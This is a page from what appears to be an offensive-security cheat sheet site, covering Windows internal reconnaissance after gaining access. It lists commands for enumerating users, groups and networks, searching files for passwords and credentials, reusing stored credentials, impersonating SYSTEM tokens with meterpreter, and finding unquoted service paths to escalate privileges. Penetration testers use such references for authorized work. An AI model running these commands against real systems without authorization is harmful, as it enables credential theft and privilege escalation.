pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • General
  • System info
  • Users/localgroups on the machine
  • Network information/connections
  • Search tips
  • Privilege Escalation
  • Stored Credential
  • Impersonating Tokens with meterpreter
  • Unquoted Path

Was this helpful?

  1. SO
  2. Windows

Internal Recon

General

System info

systeminfo
hostname
whoami /all

Users/localgroups on the machine

net users
net localgroups
net localgroups Administrators
net user hax0r

#Check local and domain
net user hax0r /domain
net group Administrators /domain

Network information/connections

ipconfig /all
route print
arp -A
netstat -ano

Search tips

#FindStr
findstr /spin "password" *.* //Recursive string scan

#Dir
dir /a-r-d /s /b //Search for writeable directories
dir secret.txt /s /p //Search for secret.txt recursive from folder
dir /s *pass* == *cred* == *vnc* == *.config* //Search for certain words

Privilege Escalation

Stored Credential

cmdkey /list //Check if any stored key
runas /user:administrator /savecred "cmd.exe /k whoami" //Using them

Impersonating Tokens with meterpreter

use incognito
list_tokens -u
impersonate_token NT-AUTHORITY\System

Unquoted Path

#Obtain the path of the executable called by a Windows service
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

#Default search
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v
PreviousWindowsNextExternal Recon

Last updated 3 years ago

Was this helpful?